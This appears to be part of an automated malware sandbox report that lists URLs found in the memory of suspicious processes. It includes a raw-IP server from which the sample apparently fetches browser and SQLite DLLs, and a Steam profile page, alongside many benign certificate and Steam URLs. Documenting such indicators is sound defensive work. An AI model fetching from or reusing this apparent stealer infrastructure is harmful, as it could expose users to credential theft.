Source: katA304.tmp, 0000000D.00000003.2954487712.0000000000A36000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2866492017.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.13.dr, mozglue.dll.13.dr, softokn3[1].dll.13.dr, freebl3.dll.13.dr, mozglue[1].dll.13.dr, softokn3.dll.13.dr, freebl3[1].dll.13.dr, nss3.dll.13.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: 21AE.exe, 00000005.00000003.2384311216.0000000002C93000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: explorer.exe, 00000002.00000000.2040029267.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2040029267.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, 21AE.exe, 00000005.00000003.2384311216.0000000002C93000.00000004.00000800.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2954487712.0000000000A36000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2858305689.0000000000A4E000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.13.dr, mozglue.dll.13.dr, softokn3[1].dll.13.dr, freebl3.dll.13.dr, mozglue[1].dll.13.dr, softokn3.dll.13.dr, freebl3[1].dll.13.dr, nss3.dll.13.dr String found in binary or memory: http://ocsp.digicert.com0
Source: katA304.tmp, 0000000D.00000003.2866492017.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2954487712.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2986553646.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2954598734.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2986940209.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.13.dr, mozglue.dll.13.dr, softokn3[1].dll.13.dr, freebl3.dll.13.dr, mozglue[1].dll.13.dr, softokn3.dll.13.dr, freebl3[1].dll.13.dr, nss3.dll.13.dr String found in binary or memory: http://ocsp.digicert.com0A
Source: nss3[1].dll.13.dr, mozglue.dll.13.dr, softokn3[1].dll.13.dr, freebl3.dll.13.dr, mozglue[1].dll.13.dr, softokn3.dll.13.dr, freebl3[1].dll.13.dr, nss3.dll.13.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: katA304.tmp, 0000000D.00000003.2954487712.0000000000A36000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2866492017.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2954487712.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2986553646.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2986940209.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.13.dr, mozglue.dll.13.dr, softokn3[1].dll.13.dr, freebl3.dll.13.dr, mozglue[1].dll.13.dr, softokn3.dll.13.dr, freebl3[1].dll.13.dr, nss3.dll.13.dr String found in binary or memory: http://ocsp.digicert.com0N
Source: katA304.tmp, 0000000D.00000003.2954598734.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2858305689.0000000000A4E000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.13.dr, mozglue.dll.13.dr, softokn3[1].dll.13.dr, freebl3.dll.13.dr, mozglue[1].dll.13.dr, softokn3.dll.13.dr, freebl3[1].dll.13.dr, nss3.dll.13.dr String found in binary or memory: http://ocsp.digicert.com0X
Source: explorer.exe, 00000002.00000000.2040029267.00000000099C0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: 21AE.exe, 00000005.00000003.2384311216.0000000002C93000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: C9A7.exe, 0000000C.00000002.2640862661.00000000041D0000.00000040.00001000.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000000.2638757947.00000000004B4000.00000002.00000001.01000000.00000009.sdmp, katA304.tmp.12.dr String found in binary or memory: http://rpi.net.au/~ajohnson/resourcehacker
Source: explorer.exe, 00000002.00000000.2039593214.0000000008890000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2038682959.0000000007DC0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2039552832.0000000008870000.00000002.00000001.00040000.00000000.sdmp String found in binary or memory: http://schemas.micro
Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2730520789.00000000009EE000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2654301050.00000000009A4000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3125392670.00000000009EE000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.dr String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2730520789.00000000009EE000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2654301050.00000000009A4000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3125392670.00000000009EE000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.dr String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2730520789.00000000009EE000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2654301050.00000000009A4000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3125392670.00000000009EE000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.dr String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: katA304.tmp, 0000000D.00000003.2954487712.0000000000A36000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2866492017.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2954487712.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2986553646.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2986940209.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.13.dr, mozglue.dll.13.dr, softokn3[1].dll.13.dr, freebl3.dll.13.dr, mozglue[1].dll.13.dr, softokn3.dll.13.dr, freebl3[1].dll.13.dr, nss3.dll.13.dr String found in binary or memory: http://www.digicert.com/CPS0
Source: katA304.tmp, katA304.tmp, 0000000D.00000002.3150422505.000000006CFBD000.00000002.00000001.01000000.0000000D.sdmp, mozglue.dll.13.dr, mozglue[1].dll.13.dr String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: katA304.tmp, 0000000D.00000002.3137349984.000000002021D000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3135734102.000000001DE0D000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.13.dr String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2654301050.00000000009A4000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.dr String found in binary or memory: http://www.valvesoftware.com/legal.htm
Source: 21AE.exe, 00000005.00000003.2384311216.0000000002C93000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.c.lencr.org/0
Source: 21AE.exe, 00000005.00000003.2384311216.0000000002C93000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.i.lencr.org/0
Source: 76561199689717899[1].htm.13.dr String found in binary or memory: https://65.109.242.59
Source: katA304.tmp, 0000000D.00000003.2730520789.00000000009D8000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009C1000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009D8000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2745951442.00000000009C1000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2730520789.00000000009C1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/
Source: katA304.tmp, 0000000D.00000003.2745951442.00000000009D8000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2714941039.00000000009D8000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2699380936.00000000009D8000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2730520789.00000000009D8000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009D8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/#
Source: katA304.tmp, 0000000D.00000003.2745951442.00000000009D8000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2699380936.00000000009D8000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2730520789.00000000009D8000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009D8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/.
Source: katA304.tmp, 0000000D.00000003.2745951442.00000000009D8000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2714941039.00000000009D8000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2699380936.00000000009D8000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2730520789.00000000009D8000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009D8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/8
Source: katA304.tmp, 0000000D.00000003.2745951442.00000000009D8000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2714941039.00000000009D8000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2699380936.00000000009D8000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2730520789.00000000009D8000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009D8000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3125392670.00000000009D4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/H
Source: katA304.tmp, 0000000D.00000002.3125392670.00000000009BB000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2866839483.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2954598734.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2986553646.0000000000A35000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2969971877.0000000000A34000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/freebl3.dll
Source: katA304.tmp, 0000000D.00000003.2699380936.00000000009C1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/g
Source: katA304.tmp, 0000000D.00000003.2730520789.00000000009D8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/k
Source: katA304.tmp, 0000000D.00000003.2745951442.00000000009D8000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2714941039.00000000009D8000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2699380936.00000000009D8000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2730520789.00000000009D8000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009D8000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3125392670.00000000009D4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/l
Source: katA304.tmp, 0000000D.00000002.3125392670.00000000009BB000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2954598734.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2969971877.0000000000A34000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/mozglue.dll
Source: katA304.tmp, 0000000D.00000003.2954598734.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2986553646.0000000000A35000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2969971877.0000000000A34000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/mozglue.dllao
Source: katA304.tmp, 0000000D.00000002.3125392670.00000000009BB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/mozglue.dllk~c
Source: katA304.tmp, 0000000D.00000002.3125392670.00000000009BB000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2954598734.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2969971877.0000000000A34000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/msvcp140.dll
Source: katA304.tmp, 0000000D.00000002.3125392670.00000000009BB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/msvcp140.dllC~
Source: katA304.tmp, 0000000D.00000002.3125392670.00000000009BB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/nss3.dll
Source: katA304.tmp, 0000000D.00000002.3125392670.00000000009BB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/nss3.dll7
Source: katA304.tmp, 0000000D.00000003.2745951442.00000000009D8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/r
Source: katA304.tmp, 0000000D.00000002.3125392670.00000000009BB000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2954598734.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2969971877.0000000000A34000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/softokn3.dll
Source: katA304.tmp, 0000000D.00000002.3122811283.000000000052E000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/sqls.dll
Source: katA304.tmp, 0000000D.00000002.3125392670.0000000000997000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/sqls.dllYVj
Source: katA304.tmp, 0000000D.00000002.3125392670.0000000000997000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/vcruntime140.dll
Source: katA304.tmp, 0000000D.00000002.3122811283.0000000000434000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.5908b543ef9ant-Disposition:
Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59;
Source: katA304.tmp, 0000000D.00000002.3122811283.000000000042E000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59ECAE
Source: katA304.tmp, 0000000D.00000002.3122811283.000000000060B000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59JKFI
Source: katA304.tmp, 0000000D.00000002.3122811283.0000000000572000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59KKEH
Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59a
Source: 21AE.exe, 00000005.00000003.2359708104.0000000002CA7000.00000004.00000800.00020000.00000000.sdmp, 21AE.exe, 00000005.00000003.2359456032.0000000002CA7000.00000004.00000800.00020000.00000000.sdmp, 21AE.exe, 00000005.00000003.2359292886.0000000002CAA000.00000004.00000800.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2814628102.0000000000A70000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: explorer.exe, 00000002.00000000.2042302155.000000000C4DC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
Source: explorer.exe, 00000002.00000000.2037994793.00000000076F8000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://android.notify.windows.com/iOS
Source: explorer.exe, 00000002.00000000.2040029267.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 00000002.00000000.2037994793.0000000007637000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: katA304.tmp, 0000000D.00000003.2654301050.00000000009B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.steampowered.com/
Source: explorer.exe, 00000002.00000000.2037244792.00000000035FA000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://arc.msn.coml
Source: 76561199689717899[1].htm.13.dr String found in binary or memory: https://avatars.cloudflare.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
Source: katA304.tmp, 0000000D.00000002.3125392670.00000000009F4000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3125392670.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3125392670.0000000000B14000.00000004.00000020.00020000.00000000.sdmp, BGHJJD.13.dr String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
Source: katA304.tmp, 0000000D.00000002.3125392670.00000000009F4000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3125392670.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3125392670.0000000000B14000.00000004.00000020.00020000.00000000.sdmp, BGHJJD.13.dr String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
Source: katA304.tmp, 0000000D.00000003.2654301050.00000000009B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://broadcast.st.dl.eccdnx.com
Source: katA304.tmp, 0000000D.00000003.2654301050.00000000009B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/
Source: 21AE.exe, 00000005.00000003.2359708104.0000000002CA7000.00000004.00000800.00020000.00000000.sdmp, 21AE.exe, 00000005.00000003.2359456032.0000000002CA7000.00000004.00000800.00020000.00000000.sdmp, 21AE.exe, 00000005.00000003.2359292886.0000000002CAA000.00000004.00000800.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2814628102.0000000000A70000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: 21AE.exe, 00000005.00000003.2359708104.0000000002CA7000.00000004.00000800.00020000.00000000.sdmp, 21AE.exe, 00000005.00000003.2359456032.0000000002CA7000.00000004.00000800.00020000.00000000.sdmp, 21AE.exe, 00000005.00000003.2359292886.0000000002CAA000.00000004.00000800.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2814628102.0000000000A70000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: 21AE.exe, 00000005.00000003.2359708104.0000000002CA7000.00000004.00000800.00020000.00000000.sdmp, 21AE.exe, 00000005.00000003.2359456032.0000000002CA7000.00000004.00000800.00020000.00000000.sdmp, 21AE.exe, 00000005.00000003.2359292886.0000000002CAA000.00000004.00000800.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2814628102.0000000000A70000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: katA304.tmp, 0000000D.00000003.2654301050.00000000009B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://checkout.steampowered.com/
Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://community.clo
Source: katA304.tmp, 0000000D.00000003.2654301050.00000000009B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/
Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2654301050.00000000009A4000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/applications/community/main.css?v=Hpc3R3GOIT
Source: katA304.tmp, 0000000D.00000003.2699380936.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3125392670.00000000009E5000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2714941039.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2730520789.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2745951442.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/globalv2.css?v=pwVcIAtHNXwg&amp;l=english&am
Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/promo/summer2017/stickers.css?v=bZKSp7oNwVPK
Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/header.css?v=vh4BMeDcNiCU&amp;l=engli
Source: katA304.tmp, 0000000D.00000003.2699380936.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3125392670.00000000009E5000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2714941039.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2730520789.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2745951442.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/modalContent.css?v=.TP5s6TzX6LLh&amp;
Source: katA304.tmp, 0000000D.00000003.2699380936.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3125392670.00000000009E5000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2714941039.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2730520789.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2745951442.00000000009E3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/pr
Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/profilev2.css?v=gNE3gksLVEVa&amp;l=en
Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2654301050.00000000009A4000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
Source: katA304.tmp, 0000000D.00000003.2730520789.00000000009EE000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2654301050.00000000009A4000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3125392670.00000000009EE000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2654301050.00000000009A4000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/libraries~b28b
Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2654301050.00000000009A4000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/main.js?v=7tll
Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2654301050.00000000009A4000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/manifest.js?v=
Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/global.js?v=PyuRtGtUpR0t&amp;l=englis
Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC&
Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/modalContent.js?v=Wd0kCESeJquW&amp;l=
Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&amp;l=engli
